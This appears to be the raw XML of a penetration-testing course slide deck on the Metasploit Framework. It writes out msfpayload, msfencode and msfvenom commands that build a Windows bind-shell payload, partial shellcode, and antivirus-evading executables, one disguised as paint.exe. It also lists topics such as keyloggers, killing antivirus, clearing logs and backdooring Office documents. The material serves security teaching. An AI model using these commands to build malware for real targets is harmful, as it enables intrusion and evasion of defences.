                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>generate -h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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Usage: generate [options]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OPTIONS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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-E	        Force encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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-b &lt;opt&gt;  The list of characters to avoid: '\x00\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xff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‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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-e &lt;opt&gt;  The name of the encoder module to use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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-f &lt;opt&gt;  The output file name (otherwise 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stdout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-o &lt;opt&gt;  Comma separated list of options VAR=VAL format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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-s &lt;opt&gt;  NOP sled length.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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-t &lt;opt&gt;  Output format: raw, ruby, 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perl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, bash, c, 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js,exe,etc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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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Other Options (check the console).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Generating Shellcode using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msfpayload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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  <a:buNone/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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfpayload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 windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell_bind_tcp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 LPORT=2222 y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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# windows/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shell_bind_tcp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- 341 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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# http://www.metasploit.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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# VERBOSE=false, LPORT=2222, RHOST=, EXITFUNC=process, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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# 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InitialAutoRunScript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=, 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AutoRunScript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=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pP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buf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= </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xfc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\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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"\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xff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\x31\xc0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xac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\x3c\x61\x7c\x02\x2c\x20\xc1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xcf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\x0d" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000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[………..]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000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Creating Executable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None/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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> LPORT=2222 X &gt; msf.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (http://www.metasploit.com).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Payload: windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Length: 341</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Options: {"LPORT"=&gt;"2222"}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None/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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>file msf.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msf.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit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#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whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000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Ali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Al-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shemery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Ph.D., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>., and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BS.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jordan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More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>than 14 years of Technical Background (mainly Linux/Unix and </a:t>
            </a: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Technical Instructor for more than 10 years (</a:t>
            </a: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, and Linux Courses)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Hold more than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>15 well </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certificates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 &amp; Linux are my main Interests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Encode Executables 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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfpayload</a:t>
            </a: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 windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell_bind_tcp</a:t>
            </a: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 LPORT=2222 R | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a: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 -t exe -o msf2.exe -b "\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a: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\x0a\x0d\x1a"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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[*] x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shikata_ga_nai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 succeeded with size 368 (iteration=1)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# </a:t>
            </a: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file msf2.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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msf2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit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Encode Executables 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None/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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfvenom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 -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell_bind_tcp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 -f exe -b "\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xff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" -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shikata_ga_na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 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 2 &gt; paint.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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None/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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>file paint.exe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buNone/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paint.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit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multi/handler Exploit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Generic Payload Handler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Supports Windows, Linux, Solaris, Unix, OSX, BSD, PHP, and Java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Useful with Client-Side Attacks (waiting for a payload to connect)!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None/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msf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&gt; </a:t>
            </a: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use exploit/multi/handler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Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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An advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. 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It communicates over the stager socket and provides a comprehensive client-side Ruby API. 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Lots of great features (we’ll see them shortly)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Originally written by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skape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for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Metasploit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2.x.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The server portion is implemented in plain C and is now compiled with MSVC, making it somewhat portable.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How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Meterpreter</a:t>
            </a:r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Target executes the initial stager (one of </a:t>
            </a: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bind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reverse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latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>findtag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latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>passivex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etc).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Stager loads the Reflective DLL.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Reflective stub handles the loading/injection of the DLL.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Core initializes, establishes a TLS/1.0 link over the socket and sends a GET. </a:t>
            </a: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Metasploit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receives this GET and configures the client.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Finally,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Meterpreter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loads extensions.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Meterpreter</a:t>
            </a:r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Design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Stealthy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Resides entirely in memory (nothing written to disk)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No new processes are created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uses encrypted communications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Powerful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Channelized communication system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TLV protocol has few limitations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Extensible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Can load new features at runtime, loaded over network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Add new features without having to rebuild it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MSF Evasion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Each module has a number of Advanced and Evasion options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Compression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Encoding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Encryption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Fragmentation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Timing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Padding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Obscure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etc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Use “</a:t>
            </a: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show evasion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” to list the available evasion options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Demo Time!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MSF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Talking about MSF will start, but not end, so lets check some demo’s and labs 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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a: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Filesystem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MSF Basic usages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Exploitation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Working with the MSF Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Post Exploitation - Windows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Info. Gathering: local subnets, scraper,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winenum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applications installed, virtualized, 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Uploading and Downloading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Scanning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Pivoting (Routing, and Port Forwarding)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Incognito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Sniffing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Persistence and Backdoors</a:t>
            </a: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Keyloggers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the right way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Enable Remote Desktop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User Management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Killing AV, Disabling FW, and Clearing the Logs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Playing with System Services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61925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Metasploit</a:t>
            </a:r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Framework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20000" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>a weaponry for the good, the bad, and the ugly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Post Exploitation - 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Info. Gathering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Uploading and Downloading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Scanning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User Management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Disabling FW, and Clearing the Logs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Playing with System Services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Misc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Playing with MSF Auxiliaries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Client-Side Attacks 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File Format (Adobe)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Browser (IE)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Web Vulnerability Scanner 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wmap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Creating Malicious Executables:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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MSFPayload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MSFEncode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Packers (UPX)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Bypassing AV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Automation (Resource Scripts)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Evasion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Forensics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Assignments (Choose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If our target isn’t listed within the exploits target, how can you add it? (maybe same OS but diff language)!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How can you backdoor an Office Document? (payload=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meterpreter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What is the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Metasploit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“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RailGun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” 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SUMMARY - 1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Discussed what MSF is, and why its needed,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Explained the MSF (Architecture, Components, Libraries, Interfaces, Modules, Utilities, and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Plugins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Discussed the MSF Database, and the benefits of using it,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Went through the MSF core commands,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Explained the auxiliary modules available in MFS,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Explained the different types of Payloads MSF has, and how to use them, and the best scenarios to use each,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Discussed generating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shellcodes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and malicious executables using MSF, and how its so easy to do so,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Explained the benefits of the MSF multi-handler exploit,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Explained the MSF encoding techniques available, how to use them, and how to bypass AV,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SUMMARY - 2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Discussed in details the MSF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Meterpreter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its features, its capabilities, and what is actually its limitation!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Discussed the MSF evasion techniques and features available with the framework,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Demos we did: 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Exploiting Windows, Linux, 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Post Exploitation on both systems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Pivoting, Backdoors,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Forensics using MSF,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others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References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C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit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 Unleashed, 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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.offensive-security.com/metasploit-unleashed/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pPr>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>GrayHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Hacking: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="18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fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hacker’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="18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fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Handbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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pPr>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="18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fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Plugin Part1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.darkoperator.com/blog/2011/12/15/metasploit-pentest-plugin-part-1.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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pPr>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="18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fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Plugin Part2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.darkoperator.com/blog/2012/1/29/metasploit-pentest-plugin-part-2.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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pPr>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ReflectiveDLLInjection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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/stephenfewer/ReflectiveDLLInjection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pPr>
              <a:buClr>
                <a:srgbClr val="C0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Free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit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 Penetration Testing Lab In The Cloud, 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  <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://community.rapid7.com/community/metasploit/blog/2013/01/08/free-metasploit-penetration-testing-lab-in-the-cloud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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C0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Post-Exploitation in Windows: From Local Admin To Domain Admin (efficiently), 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  <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://pentestmonkey.net/uncategorized/from-local-admin-to-domain-admin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References - 2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C00000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
